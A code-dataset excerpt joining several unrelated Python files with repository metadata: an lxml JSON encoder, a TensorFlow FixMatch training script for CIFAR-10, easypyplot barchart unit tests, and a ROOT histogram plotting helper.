# Append the Point element to the first child
list(feat_elm)[0].append(pnt_elm)
return feat_elm
class ObjectifyJSONEncoder(json.JSONEncoder):
""" JSON encoder that can handle simple lxml objectify types,
based on the original: https://gist.github.com/aisipos/345559, extended
to accommodate encoding child nodes with the same tag name as a list.
Usage:
>>> import json
>>> import lxml
>>> from lxml import objectify
>>> obj = objectify.fromstring("<author><name>W. Shakespeare</name><play>Twelfth Night</play><play>As You Like It</play></author>")
>>> json.dumps(obj, cls=ObjectifyJSONEncoder)
'{"play": ["Twelfth Night", "As You Like It"], "name": "W. Shakespeare"}'
"""
def default(self, o):
if isinstance(o, lxml.objectify.IntElement):
return int(o)
if isinstance(o, lxml.objectify.NumberElement) or isinstance(o, lxml.objectify.FloatElement):
return float(o)
if isinstance(o, lxml.objectify.ObjectifiedDataElement):
return str(o)
if hasattr(o, '__dict__'):
# objectify elements act like dicts to allow access to child nodes
# via their tag name. If an element has more than one child of the
# same name the dict only contains the first value against the tag
# name; to ensure all children are encoded create a list of child
# node values and assign it to the key that matches their tag name.
d = o.__dict__.copy()
for k in d.keys():
if len(d[k]) > 1:
d[k] = [i for i in d[k]]
return d
return json.JSONEncoder.default(self, o)
| [
"walkermatt@longwayaround.org.uk"
] | walkermatt@longwayaround.org.uk |
c0e913617260c8a7f14ec70f417516e956959dab | 2bc23f78fc42d0904e0ed7846da72b5390cb668e | /train.py | cc4b1e7401d51e28bd2f7d4dfa9483c2be7c07dd | [] | no_license | zhao65515/Tensorflow_FixMatch | 120f6f8e2bec5b644cb9d060a7593317abd8a852 | 37a770199564c90e67f0fe08c110b5d3190a15c2 | refs/heads/master | 2022-11-14T03:47:56.261856 | 2020-06-29T04:44:03 | 2020-06-29T04:44:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,409 | py | # Copyright (C) 2020 * Ltd. All rights reserved.
# author : Sanghyeon Jo <josanghyeokn@gmail.com>
import os
import cv2
import sys
import copy
import time
import glob
import json
import random
import pickle
import argparse
import numpy as np
import tensorflow as tf
import multiprocessing as mp
from core.config import *
from core.classifier import *
from core.augment.augmentors import *
from data.loader import *
from data.decoder import *
from data.batch_loader import *
from data.prefetch import *
from data.generator import *
from utility.utils import *
from utility.dataset_utils import *
from utility.tensorflow_utils import *
from utility.timer import *
from utility.logger import *
if __name__ == '__main__':
#######################################################################################
# 1. Config
#######################################################################################
flags = get_config()
set_seed(flags.seed)
num_gpu = len(flags.use_gpu.split(','))
os.environ["CUDA_VISIBLE_DEVICES"] = flags.use_gpu
iteration = flags.train_kimgs // flags.batch_size
flags.max_iteration = flags.max_epochs * iteration
model_name = 'FixMatch_cifar@{}'.format(flags.number_of_labels)
model_dir = './experiments/model/{}/'.format(model_name)
tensorboard_dir = './experiments/tensorboard/{}'.format(model_name)
ckpt_format = model_dir + '{}.ckpt'
log_txt_path = model_dir + 'log.txt'
log_csv_path = model_dir + 'log.csv'
valid_log_path = model_dir + 'valid_log.csv'
test_log_path = model_dir + 'test_log.csv'
if not os.path.isdir(model_dir):
os.makedirs(model_dir)
if os.path.isfile(log_txt_path):
open(log_txt_path, 'w').close()
# log_func = lambda x: print(x)
log_func = lambda x: log_print(x, log_txt_path)
csv_log_func = lambda x: csv_print(x, log_csv_path)
valid_log_func = lambda x: csv_print(x, valid_log_path)
test_log_func = lambda x: csv_print(x, test_log_path)
#######################################################################################
# 1. Dataset
#######################################################################################
labeled_dataset, unlabeled_dataset, valid_dataset, test_dataset = get_dataset_cifar10(flags.number_of_labels)
#######################################################################################
# 1.1. Info (Dataset)
#######################################################################################
log_func('\n')
log_func('# labeled_dataset : {}'.format(len(labeled_dataset)))
log_func('# unlabeled_dataset : {}'.format(len(unlabeled_dataset)))
log_func('# valid_dataset : {}'.format(len(valid_dataset)))
log_func('# test_dataset : {}'.format(len(test_dataset)))
#######################################################################################
# 2. Generator & Queue
#######################################################################################
#######################################################################################
# 2.1. Select DataAugmentations.
#######################################################################################
# for weakly augmented function
if flags.weak_augmentation == 'flip_and_crop':
weakly_augment_func = Flip_and_Crop((32, 32))
# for strongly augmented function
if flags.strong_augmentation == 'randaugment':
strongly_augment_func = DataAugmentation([
Flip_and_Crop((32, 32)),
RandAugmentation(),
])
elif flags.strong_augmentation == 'randaugment':
strongly_augment_func = Flip_and_Crop((32, 32))
log_func('1. weakly={}, strongly={}'.format(weakly_augment_func, strongly_augment_func))
log_func('2. weakly={}, strongly={}'.format(flags.weak_augmentation, flags.strong_augmentation))
#######################################################################################
# 2.2. Set option.
#######################################################################################
# for labeled option
labeled_loader_option = {
'debug' : False,
'bShuffle' : True,
'dataset' : labeled_dataset,
'number_of_loading_dataset' : flags.number_of_loading_dataset,
}
labeled_decoder_option = {
'debug' : False,
'use_label' : True,
'augment_func' : weakly_augment_func,
}
labeled_batch_loader_option = {
'debug' : False,
'batch_size' : flags.batch_size,
'batch_length' : 2,
}
# for unlabeled option
unlabeled_loader_option = {
'debug' : False,
'bShuffle' : True,
'dataset' : unlabeled_dataset,
'number_of_loading_dataset' : flags.number_of_loading_dataset,
}
unlabeled_decoder_option = {
'debug' : False,
'use_label' : False,
'augment_func' : [weakly_augment_func, strongly_augment_func],
}
unlabeled_batch_loader_option = {
'debug' : False,
'batch_size' : flags.batch_size * flags.unlabeled_ratio,
'batch_length' : 1,
}
#######################################################################################
# 2.3. Create loader, decoder, batch_loader, and generator
#######################################################################################
labeled_loader = Prefetch_using_queue(lambda q: Loader(q, labeled_loader_option), use_cores = flags.number_of_loader, max_size = flags.max_size_of_loader)
labeled_decoder = Prefetch_using_queue(lambda q: Decoder(q, labeled_loader.main_queue, labeled_decoder_option), use_cores = flags.number_of_labeled_decoder, max_size = flags.max_size_of_labeled_decoder)
labeled_batch_loader = Prefetch_using_queue(lambda q: Batch_Loader(q, labeled_decoder.main_queue, labeled_batch_loader_option), use_cores = flags.number_of_batch_loader, max_size = flags.max_size_of_batch_loader)
unlabeled_loader = Prefetch_using_queue(lambda q: Loader(q, unlabeled_loader_option), use_cores = flags.number_of_loader, max_size = flags.max_size_of_loader)
unlabeled_decoder = Prefetch_using_queue(lambda q: Decoder(q, unlabeled_loader.main_queue, unlabeled_decoder_option), use_cores = flags.number_of_unlabeled_decoder, max_size = flags.max_size_of_unlabeled_decoder)
unlabeled_batch_loader = Prefetch_using_queue(lambda q: Batch_Loader(q, unlabeled_decoder.main_queue, unlabeled_batch_loader_option), use_cores = flags.number_of_batch_loader, max_size = flags.max_size_of_batch_loader)
# create placeholders.
x_image_var = tf.placeholder(tf.float32, [flags.batch_size] + [32, 32, 3])
x_label_var = tf.placeholder(tf.float32, [flags.batch_size, 10])
u_image_var = tf.placeholder(tf.float32, [flags.batch_size * flags.unlabeled_ratio, 2] + [32, 32, 3])
train_generator = Generator({
'labeled_batch_loader' : labeled_batch_loader,
'unlabeled_batch_loader' : unlabeled_batch_loader,
'placeholders' : [x_image_var, x_label_var, u_image_var],
'queue_size' : 5,
})
#######################################################################################
# 3. Model
#######################################################################################
# 3.1. set parameters.
classifier_option = {
'is_training' : True,
'mean' : [0.49139968, 0.48215841, 0.44653091],
'std' : [0.24703223, 0.24348513, 0.26158784],
'getter' : None,
'repeat' : 4,
'scales' : int(np.ceil(np.log2(32))) - 2,
'filters' : 32,
'dropout' : 0,
'classes' : 10,
}
classifier_func = lambda x: Classifier(classifier_option).forward(x)['logits']
# 3.2. build model.
x_image_op, x_label_op, u_image_op = train_generator.dequeue()
# concatenate all images which are labeled images, unlabeled images.
total_image_op = tf.concat([x_image_op, u_image_op[:, 0], u_image_op[:, 1]], axis = 0)
# interleave
skip_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
total_image_op = interleave(total_image_op, 2 * flags.unlabeled_ratio + 1)
# split 1/8
image_ops = tf.split(total_image_op, 1 + flags.unlabeled_ratio)
'''
[i] build model (gpu_id = 0, device_index = 0, reuse = False)
[i] build model (gpu_id = 1, device_index = 0, reuse = True)
[i] build model (gpu_id = 2, device_index = 0, reuse = True)
[i] build model (gpu_id = 3, device_index = 0, reuse = True)
[i] build model (gpu_id = 4, device_index = 0, reuse = True)
[i] build model (gpu_id = 5, device_index = 0, reuse = True)
[i] build model (gpu_id = 6, device_index = 0, reuse = True)
[i] build model (gpu_id = 7, device_index = 0, reuse = True)
[i] logits_op = Tensor("concat_1:0", shape=(960, 10), dtype=float32)
'''
logits_ops = []
for gpu_id, image_op in enumerate(image_ops):
with tf.device(tf.DeviceSpec(device_type = "GPU", device_index = gpu_id % num_gpu)):
with tf.variable_scope(tf.get_variable_scope(), reuse = gpu_id > 0):
logits_ops.append(classifier_func(image_op))
log_func('[i] build model (gpu_id = {}, device_index = {}, reuse = {})'.format(gpu_id, gpu_id % num_gpu, gpu_id > 0))
logits_op = tf.concat(logits_ops, axis = 0)
# de-interleave
post_ops = [v for v in tf.get_collection(tf.GraphKeys.UPDATE_OPS) if v not in skip_ops]
logits_op = de_interleave(logits_op, 2 * flags.unlabeled_ratio + 1)
log_func('[i] logits_op = {}'.format(logits_op))
# 3.3. calculate labeled loss and unlabeled loss.
labeled_logits_op = logits_op[:flags.batch_size]
weak_logits_op, strong_logits_op = tf.split(logits_op[flags.batch_size:], 2)
labeled_loss_op = tf.nn.softmax_cross_entropy_with_logits(logits = labeled_logits_op, labels = x_label_op)
labeled_loss_op = tf.reduce_mean(labeled_loss_op)
pseudo_labels = tf.stop_gradient(tf.nn.softmax(weak_logits_op, axis = -1))
pseudo_masks = tf.to_float(tf.greater_equal(tf.reduce_max(pseudo_labels, axis = -1), flags.confidence_threshold))
unlabeled_loss_op = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = strong_logits_op, labels = tf.argmax(pseudo_labels, axis = -1))
unlabeled_loss_op = tf.reduce_mean(pseudo_masks * unlabeled_loss_op) * flags.lambda_u
train_vars = get_model_vars()
l2_reg_loss_op = tf.add_n([tf.nn.l2_loss(var) for var in train_vars if 'kernel' in var.name]) * flags.weight_decay
loss_op = labeled_loss_op + unlabeled_loss_op + l2_reg_loss_op
# 3.4. build ema model.
ema = tf.train.ExponentialMovingAverage(decay = flags.ema_decay)
ema_op = ema.apply(train_vars)
# 3.5. evaluate train accuracy.
train_correct_op = tf.equal(tf.argmax(labeled_logits_op, axis = -1), tf.argmax(x_label_op, axis = -1))
train_accuracy_op = tf.reduce_mean(tf.cast(train_correct_op, tf.float32)) * 100
#######################################################################################
# 3. Optimizer
#######################################################################################
global_step = tf.placeholder(tf.float32)
learning_rate_ratio = tf.clip_by_value(tf.to_float(global_step) / flags.max_iteration, 0, 1)
learning_rate = flags.init_learning_rate * tf.cos(learning_rate_ratio * (7 * np.pi) / (2 * 8))
with tf.control_dependencies(post_ops):
train_op = tf.train.MomentumOptimizer(learning_rate, momentum = 0.9, use_nesterov = True).minimize(loss_op, colocate_gradients_with_ops = True)
train_op = tf.group(train_op, ema_op)
#######################################################################################
# 4. Test
#######################################################################################
test_image_var = tf.placeholder(tf.float32, [None, 32, 32, 3])
test_label_var = tf.placeholder(tf.float32, [None, 10])
test_option = {
'is_training' : False,
'mean' : [0.49139968, 0.48215841, 0.44653091],
'std' : [0.24703223, 0.24348513, 0.26158784],
'getter' : get_getter(ema),
'repeat' : 4,
'scales' : int(np.ceil(np.log2(32))) - 2,
'filters' : 32,
'dropout' : 0,
'classes' : 10,
}
classifier_func = lambda x: Classifier(test_option).forward(x)['predictions']
with tf.device(tf.DeviceSpec(device_type = "GPU", device_index = 0)):
with tf.variable_scope(tf.get_variable_scope(), reuse = True):
predictions_op = classifier_func(test_image_var)
test_correct_op = tf.equal(tf.argmax(predictions_op, axis = -1), tf.argmax(test_label_var, axis = -1))
test_accuracy_op = tf.reduce_mean(tf.cast(test_correct_op, tf.float32)) * 100
#######################################################################################
# 5. Tensorboard
#######################################################################################
train_summary_dic = {
'losses/total_loss' : loss_op,
'losses/labeled_loss' : labeled_loss_op,
'losses/unlabeled_loss' : unlabeled_loss_op,
'losses/l2_regularization' : l2_reg_loss_op,
'monitors/train_accuracy' : train_accuracy_op,
'monitors/learning_rate' : learning_rate,
'monitors/pseudo_mask' : tf.reduce_mean(pseudo_masks),
}
train_summary_op = tf.summary.merge([tf.summary.scalar(name, train_summary_dic[name]) for name in train_summary_dic.keys()])
train_writer = tf.summary.FileWriter(tensorboard_dir)
#######################################################################################
# 6. create Session and Saver
#######################################################################################
sess = tf.Session()
coord = tf.train.Coordinator()
saver = tf.train.Saver(max_to_keep = 2)
#######################################################################################
# 7. initialize
#######################################################################################
sess.run(tf.global_variables_initializer())
labeled_loader.start()
labeled_decoder.start()
labeled_batch_loader.start()
log_func('[i] labeled objects = {}'.format([labeled_loader, labeled_decoder, labeled_batch_loader]))
unlabeled_loader.start()
unlabeled_decoder.start()
unlabeled_batch_loader.start()
log_func('[i] unlabeled objects = {}'.format([unlabeled_loader, unlabeled_decoder, unlabeled_batch_loader]))
train_generator.set_session(sess)
train_generator.set_coordinator(coord)
train_generator.start()
#######################################################################################
# 8. Train
#######################################################################################
best_valid_accuracy = 0.0
best_test_accuracy = 0.0
train_timer = Timer()
valid_timer = Timer()
test_timer = Timer()
train_logger = Logger(
[
'total_loss',
'labeled_loss',
'unlabeled_loss',
'l2_regularization',
'train_accuracy',
],
[
'total_loss={:04.6f}',
'labeled_loss={:04.6f}',
'unlabeled_loss={:04.6f}',
'l2_regularization={:04.6f}',
'train_accuracy={:02.2f}%',
]
)
valid_logger = Logger(['Accuracy'],['valid_accuracy={:02.2f}%'])
test_logger = Logger(['Accuracy'],['test_accuracy={:02.2f}%'])
csv_log_func(train_logger.names)
valid_log_func(valid_logger.names)
test_log_func(test_logger.names)
train_timer.tik()
train_ops = [
train_op,
loss_op,
labeled_loss_op,
unlabeled_loss_op,
l2_reg_loss_op,
train_accuracy_op,
train_summary_op
]
for step in range(1, flags.max_iteration + 1):
data = sess.run(train_ops, feed_dict = {
global_step : step,
})
train_logger.update(data[1:-1])
train_writer.add_summary(data[-1], step)
if step % flags.log_iteration == 0:
loader_size = unlabeled_loader.get_size()
decoder_size = unlabeled_decoder.get_size()
batch_loader_size = unlabeled_batch_loader.get_size()
log_string = train_logger.log()
log_string = '[i] step={} '.format(step) + log_string
log_string += 'loader_size={} '.format(loader_size)
log_string += 'decoder_size={} '.format(decoder_size)
log_string += 'batch_loader_size={} '.format(batch_loader_size)
log_string += 'train_sec={}sec '.format(train_timer.tok())
log_func(log_string)
csv_log_func(train_logger.get_data())
train_logger.clear()
train_timer.tik()
#######################################################################################
# 10. Validation
#######################################################################################
if step % flags.valid_iteration == 0:
# validation
valid_timer.tik()
valid_logger.clear()
for i in range(len(valid_dataset) // flags.batch_size):
batch_data_list = valid_dataset[i * flags.batch_size : (i + 1) * flags.batch_size]
batch_image_data = np.zeros((flags.batch_size, 32, 32, 3), dtype = np.float32)
batch_label_data = np.zeros((flags.batch_size, 10), dtype = np.float32)
for i, (image, label) in enumerate(batch_data_list):
batch_image_data[i] = image.astype(np.float32)
batch_label_data[i] = label.astype(np.float32)
_feed_dict = {
test_image_var : batch_image_data,
test_label_var : batch_label_data,
}
accuracy = sess.run(test_accuracy_op, feed_dict = _feed_dict)
valid_logger.update([accuracy])
[valid_accuracy] = valid_logger.get_data()
if best_valid_accuracy <= valid_accuracy:
best_valid_accuracy = valid_accuracy
saver.save(sess, ckpt_format.format(step))
valid_log_func(valid_logger.get_data())
log_string = valid_logger.log()
log_string = '[i] step={} '.format(step) + log_string
log_string += 'best_valid_accuracy={:02.2f}% valid_sec={}sec'.format(best_valid_accuracy, valid_timer.tok())
log_func(log_string)
# test
test_timer.tik()
test_logger.clear()
for i in range(len(test_dataset) // flags.batch_size):
batch_data_list = test_dataset[i * flags.batch_size : (i + 1) * flags.batch_size]
batch_image_data = np.zeros((flags.batch_size, 32, 32, 3), dtype = np.float32)
batch_label_data = np.zeros((flags.batch_size, 10), dtype = np.float32)
for i, (image, label) in enumerate(batch_data_list):
batch_image_data[i] = image.astype(np.float32)
batch_label_data[i] = label.astype(np.float32)
_feed_dict = {
test_image_var : batch_image_data,
test_label_var : batch_label_data,
}
accuracy = sess.run(test_accuracy_op, feed_dict = _feed_dict)
test_logger.update([accuracy])
[test_accuracy] = test_logger.get_data()
if best_test_accuracy <= test_accuracy:
best_test_accuracy = test_accuracy
saver.save(sess, ckpt_format.format(step))
test_log_func(test_logger.get_data())
log_string = test_logger.log()
log_string = '[i] step={} '.format(step) + log_string
log_string += 'best_test_accuracy={:02.2f}% test_sec={}sec'.format(best_test_accuracy, test_timer.tok())
log_func(log_string)
saver.save(sess, ckpt_format.format('end'))
| [
"josanghyeokn@gmail.com"
] | josanghyeokn@gmail.com |
6d6fd631a84409110e6ebdbb70e519217620e0ec | 1618286b6996f70d1884ed7f063ceaca7a9ec028 | /Week1-Implementation/venv/Lib/site-packages/easypyplot/tests/test_barchart.py | bc22ad88c4ce8bcc1ad9395598872add30408c80 | [] | no_license | alu-rwa-dsa/week-1-list-complexity-code_masters_marthely_luckyjohn | 610e4a3b697f4d848c790c7faaa8a3e2be466648 | 709ab56d2efe72ab0eefbd227d15bd325d59178e | refs/heads/main | 2023-02-23T21:56:09.811829 | 2021-02-02T17:59:16 | 2021-02-02T17:59:16 | 335,334,885 | 0 | 0 | null | 2021-02-02T15:29:23 | 2021-02-02T15:29:17 | null | UTF-8 | Python | false | false | 9,402 | py | """ $lic$
Copyright (c) 2016-2019, Mingyu Gao
All rights reserved.
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
import unittest
import numpy as np
from matplotlib import pyplot as plt
from easypyplot import barchart
from . import image_comparison
from . import setup, teardown
def _data():
return [[1, 3], [2, 4], [3.5, 1.5]]
@image_comparison(baseline_images=['barchart_base'],
remove_text=False)
def test_barchart_base():
''' bar chart base. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data())
@image_comparison(baseline_images=['barchart_nparray'],
remove_text=False)
def test_barchart_nparray():
''' bar chart with data np.array. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, np.array(_data()))
@image_comparison(baseline_images=['barchart_hdls'],
remove_text=False)
def test_barchart_hdls():
''' bar chart handlers. '''
fig = plt.figure()
ax = fig.gca()
hdls = barchart.draw(ax, _data())
ax.legend(hdls, ['E1', 'E2'])
@image_comparison(baseline_images=['barchart_group_names'],
remove_text=False)
def test_barchart_group_names():
''' bar chart group names. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), group_names=['Aa', 'Bb', '$Cc$'])
@image_comparison(baseline_images=['barchart_entry_names'],
remove_text=False)
def test_barchart_entry_names():
''' bar chart entry names. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), entry_names=['x', '$x^2$'])
@image_comparison(baseline_images=['barchart_nobkdn'],
remove_text=False)
def test_barchart_nobkdn():
''' bar chart without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), breakdown=False)
@image_comparison(baseline_images=['barchart_width'],
remove_text=False)
def test_barchart_width():
''' bar chart width. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), width=0.5)
@image_comparison(baseline_images=['barchart_width_nobkdn'],
remove_text=False)
def test_barchart_width_nobkdn():
''' bar chart width without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), width=0.5, breakdown=False)
@image_comparison(baseline_images=['barchart_cbshrk'],
remove_text=False)
def test_barchart_cbshrk():
''' bar chart cluster_bar_shrink. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), cluster_bar_shrink=0.5)
@image_comparison(baseline_images=['barchart_cbshrk_nobkdn'],
remove_text=False)
def test_barchart_cbshrk_nobkdn():
''' bar chart cluster_bar_shrink without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), cluster_bar_shrink=0.5, breakdown=False)
@image_comparison(baseline_images=['barchart_xticks'],
remove_text=False)
def test_barchart_xticks():
''' bar chart xticks. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticks=[0, 2, 3])
@image_comparison(baseline_images=['barchart_xticks_nobkdn'],
remove_text=False)
def test_barchart_xticks_nobkdn():
''' bar chart xticks without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticks=[0, 2, 3], breakdown=False)
@image_comparison(baseline_images=['barchart_colors'])
def test_barchart_colors():
''' bar chart colors. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), colors=['r', 'b'])
@image_comparison(baseline_images=['barchart_colors_nobkdn'])
def test_barchart_colors_nobkdn():
''' bar chart colors without breakdown. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), colors=['r', 'b'], breakdown=False)
@image_comparison(baseline_images=['barchart_edgecolor'])
def test_barchart_edgecolor():
''' bar chart edgecolor. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), edgecolor='y')
@image_comparison(baseline_images=['barchart_edgecolor_none'])
def test_barchart_edgecolor_none():
''' bar chart edgecolor. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), edgecolor=None)
@image_comparison(baseline_images=['barchart_hatchs'])
def test_barchart_hatchs():
''' bar chart hatchs. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), hatchs=['/', '//'])
@image_comparison(baseline_images=['barchart_linewidth'])
def test_barchart_linewidth():
''' bar chart linewidth. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), linewidth=5.0)
@image_comparison(baseline_images=['barchart_hatchcolor'])
def test_barchart_hatchcolor():
''' bar chart hatchcolor. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), hatchcolor='r', hatchs=['/', '//'])
@image_comparison(baseline_images=['barchart_legend_opts'],
remove_text=False)
def test_barchart_legend_opts():
''' bar chart legend options. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), legendloc='lower center', legendncol=2,
entry_names=['X', 'Y'])
@image_comparison(baseline_images=['barchart_yaxis_log'],
remove_text=False)
def test_barchart_yaxis_log():
''' bar chart yaxis log. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), log=True)
@image_comparison(baseline_images=['barchart_xticklabelfontsize'],
remove_text=False)
def test_barchart_xtlfontsize():
''' bar chart xticklabel fontsize. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticklabelfontsize=20,
group_names=['a', 'b', 'c'])
@image_comparison(baseline_images=['barchart_xticklabelrotation'],
remove_text=False)
def test_barchart_xtlrotation():
''' bar chart xticklabelrotation. '''
fig = plt.figure()
ax = fig.gca()
barchart.draw(ax, _data(), xticklabelrotation=60,
group_names=['a', 'b', 'c'])
class TestBarchart(unittest.TestCase):
''' Tests for barchart module. '''
def setUp(self):
self.origs = setup()
self.axes = plt.figure().gca()
def tearDown(self):
teardown(self.origs)
def test_return_num_handlers(self):
''' Returned number of handlers. '''
hdls = barchart.draw(self.axes, _data())
self.assertEqual(len(hdls), len(_data()[0]))
def test_invalid_data(self):
''' Invalid data. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*array.*'):
barchart.draw(self.axes, [[1, 2], [1, 2, 3]])
def test_invalid_data_dim(self):
''' Invalid data dimension. '''
for d in [0, 1, 3, 4]:
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*dim.*'):
barchart.draw(self.axes, np.zeros([3] * d))
def test_invalid_group_names(self):
''' Invalid group names. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*group names.*'):
barchart.draw(self.axes, _data(), group_names=['a', 'b', 'c', 'd'])
def test_invalid_entry_names(self):
''' Invalid entry names. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*entry names.*'):
barchart.draw(self.axes, _data(), entry_names=['x', 'y', 'z'])
def test_invalid_cluster_bar_shrink(self):
''' Invalid cluster_bar_shrink. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*cluster_bar_shrink.*'):
barchart.draw(self.axes, _data(), breakdown=False,
cluster_bar_shrink=1.2)
def test_invalid_xticks(self):
''' Invalid xticks. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*xticks.*'):
barchart.draw(self.axes, _data(), xticks=['x'])
def test_not_enough_def_colors(self):
''' Not enough default colors. '''
with self.assertRaisesRegexp(ValueError,
r'\[barchart\] .*default colors.*'):
barchart.draw(self.axes, [[1] * 100])
def test_invalid_colors(self):
''' Invalid colors. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*colors.*'):
barchart.draw(self.axes, _data(), colors=['k'])
def test_invalid_hatchs(self):
''' Invalid hatchs. '''
with self.assertRaisesRegexp(ValueError, r'\[barchart\] .*hatchs.*'):
barchart.draw(self.axes, _data(), hatchs=['/', '//', 'xx'])
| [
"n.marthely@alustudent.com"
] | n.marthely@alustudent.com |
844e23da7322d2935b6f935d9e3649d6e5a8c6db | abf4a37e5763d5212119bdf0bedb766a456c1780 | /util/plothelper.py | d919faa5e909c8518e4ebbc4abd78237a8c93cbf | [] | no_license | kdipetri/SUEP_scouting | 739e5d93c2d7f08d0678859d89996e9b1b53132d | ff2de840da19b6e6eafa02605a1504820ed3386f | refs/heads/main | 2023-07-27T23:28:53.352037 | 2021-09-09T17:42:27 | 2021-09-09T17:42:27 | 394,385,624 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,008 | py | import ROOT
hists1D = {}
hists2D = {}
plotdir = "plots/hists"
doPng=True
doPdf=False
doC=False
lumi=135000 #ipb
one = ROOT.TColor(2001,143/255.,45 /255.,86/255.,"darkPurple")#quinacridone magenta
two = ROOT.TColor(2002,119/255.,104/255.,174/255.,"blahBlue")#blue-violet
three = ROOT.TColor(2003,239/255.,71 /255.,111/255.,"pinkRed")#paradise pink
four = ROOT.TColor(2004,247/255.,178/255.,103/255.,"orange")#orange
five = ROOT.TColor(2005,42 /255.,157/255.,143/255.,"PersianGreen")# persian green
six = ROOT.TColor(2006,38 /255.,70 /255.,83 /255.,"Charcol")# charcol
seven = ROOT.TColor(2007,116/255.,165/255.,127/255.,"Green")#forest green
eight = ROOT.TColor(2008,233/255.,196/255.,106/255.,"Maize")# maize
nine = ROOT.TColor(2009,8/255.,103/255.,136/255.,"RussianViolet")#russian violet
ten = ROOT.TColor(2010,231/255.,111/255.,81 /255.,"TerraCotta")# terra cotta
colors = [] #[2001,2002,2003,2004,2005,2006,2007,2008,2009,2010]
colors.append(2003)#paradise
colors.append(2004)#orange
colors.append(2005)#persian green
colors.append(2002)#blue-violet
colors.append(2001)#quinacridone magenta
colors.append(2010)#terra cotta
colors.append(2008)#maize
colors.append(2007)#forest green
colors.append(2009)#bluesapphire
colors.append(2006)#charcol
def setStyle():
ROOT.gROOT.SetBatch(ROOT.kTRUE)
ROOT.gStyle.SetOptStat(0)
ROOT.gStyle.SetOptFit(0)
ROOT.gStyle.SetLabelFont(42,"xyz")
ROOT.gStyle.SetLabelSize(0.05,"xyz")
ROOT.gStyle.SetTitleFont(42,"xyz")
ROOT.gStyle.SetTitleFont(42,"t")
ROOT.gStyle.SetTitleSize(0.06,"xyz")
ROOT.gStyle.SetTitleSize(0.06,"t")
ROOT.gStyle.SetPadBottomMargin(0.14)
ROOT.gStyle.SetPadLeftMargin(0.14)
ROOT.gStyle.SetPadGridX(0)
ROOT.gStyle.SetPadGridY(0)
ROOT.gStyle.SetPadTickX(1)
ROOT.gStyle.SetPadTickY(1)
ROOT.gStyle.SetTitleOffset(1,'y')
ROOT.gStyle.SetLegendTextSize(0.04)
ROOT.gStyle.SetGridStyle(3)
ROOT.gStyle.SetGridColor(14)
ROOT.gStyle.SetMarkerSize(1.0) #large markers
ROOT.gStyle.SetHistLineWidth(2) # bold lines
ROOT.gStyle.SetLineStyleString(2,"[12 12]") # postscript dashes
#one = ROOT.TColor(2001,0.906,0.153,0.094)
#two = ROOT.TColor(2002,0.906,0.533,0.094)
#three = ROOT.TColor(2003,0.086,0.404,0.576)
#four =ROOT.TColor(2004,0.071,0.694,0.18)
#five =ROOT.TColor(2005,0.388,0.098,0.608)
#six=ROOT.TColor(2006,0.906,0.878,0.094)
#seven=ROOT.TColor(2007,0.99,0.677,0.614)
#colors = [1,2001,2002,2003,2004]
return
def plot1D(name, title, x, nbinsx, xmin, xmax, weight=1.):
if name in hists1D:
# fill
hists1D[name].Fill(x,weight)
else :
# create and fill
hist = ROOT.TH1F(name, title, nbinsx, xmin, xmax)
hist.SetDirectory(0)
hist.Fill(x,weight)
hists1D[name] = hist
return
def plot2D(name, title, x, y, nbinsx, xmin, xmax, nbinsy, ymin, ymax, weight=1.):
if name in hists2D:
# fill
hists2D[name].Fill(x,y,weight)
else :
# create and fill
hist = ROOT.TH2F(name, title, nbinsx, xmin, xmax, nbinsy, ymin, ymax)
hist.SetDirectory(0)
hist.Fill(x,weight)
hists2D[name] = hist
return
def draw1D(c1,h, drawopt="hist"):
c1.cd()
c1.Clear()
h.Draw(drawopt)
if doPng: c1.Print("{}/{}.png".format(plotdir,h.GetName()))
if doPdf: c1.Print("{}/{}.pdf".format(plotdir,h.GetName()))
if doC : c1.Print("{}/{}.C".format(plotdir,h.GetName()))
h.Write()
return
def draw2D(c2, h, drawopt="COLZ"):
c2.cd()
c2.Clear()
c2.SetTopMargin(0.05)
c2.SetLeftMargin(0.2)
c2.SetBottomMargin(0.2)
